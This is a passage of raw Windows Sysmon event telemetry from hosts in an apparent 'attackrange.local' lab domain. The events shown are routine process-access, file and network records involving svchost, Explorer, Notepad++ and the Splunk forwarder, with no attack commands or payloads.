07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104184Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104183Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104182Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104181Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104180Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104179Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104178Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104177Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104176Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104175Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104174Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104173Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104172Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104171Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104170Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104169Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104168Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104167Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104200Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:16.857{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EFFF701D02526734F013E1294DDAC3E,SHA256=48920026D11F4833648E199B367CC3CD06ED4C8029EA540099C36AC0F46D4480,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082021Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:16.576{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1CBD67188B8FF664A4E02937C5E417E,SHA256=30B459CE9FE42AE5480ACA3C3587B2AEE61FE09C5911775802B611880E2D2871,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104199Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:16.841{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104198Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:16.841{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104197Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:16.841{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104201Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:17.857{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D112AD8F1DC83919D02F3F0CA59BDE33,SHA256=F693C9BBD29D9A9779E1DB774BCEA3E6CFA2F26955AA34C2583897EEE784D1F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082022Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:17.576{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=449A68E94887E1AF9834F893A151C3BD,SHA256=97800217192681BD7016794C85F527902CD635DDF3E260228FF4FEE716BCC5E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082025Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:18.998{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=E74B06E78A526FAAC4986525AA473D95,SHA256=3823BF01142298CF6DDBEB888156296F373CB2C244D1A801DBD42C1AC5A8EEC3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082024Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:15.598{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50070-false10.0.1.12-8000- 23542300x800000000000000082023Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:18.592{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4654541A78F30C122EC7D3CDC6933DEC,SHA256=006448E38F95CB39B7BE952128DE9D278746D48EE4C1DC974B11D92B95C8C812,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104203Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:18.857{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6728076D3EE21E91B9BBAD18ED19484C,SHA256=D173D76C5DF0124DE24FB64BB53C999BDBB5E00201B39170F5E45E0D64D2FFEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104202Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:18.638{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 2@2021-10-04_075343MD5=5CF2DA39F3C96B2DCC93D748D4BE9746,SHA256=83FD7AE6BD3AA9B52A8C9F90449E9E5AA13F5B833E3D5D72798856B124F29E2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104204Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:19.857{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6668E5DD019963A86D0E706C83934A82,SHA256=35C53F20A530C7E65247A413EDE683E409141D981E8C1AD1E8C1C4599550B4EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082026Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:19.592{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C32EACB69D36A7BFEAB668883480038,SHA256=9BFDF698BC227A777DBFF8F37FDC58188080E8684C1F02F98222598E9546E6F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082027Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:20.592{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D91DCE56F25A10123CF7DEA26456927,SHA256=A597A227C63C7B47CDB3207EEA7AC17E12F0A3C038BA80D4E267465C32B4C2D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104205Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:19.299{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49581-false10.0.1.12-8000- 23542300x800000000000000082028Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:21.592{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D31A31DB82B529C0A6C97ABC004CEEA,SHA256=573357715D40C55A18E8D977685726DFA9FB5A186160D3FF7DBD8BE47B90C61D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104209Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:21.498{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104208Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:21.498{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program 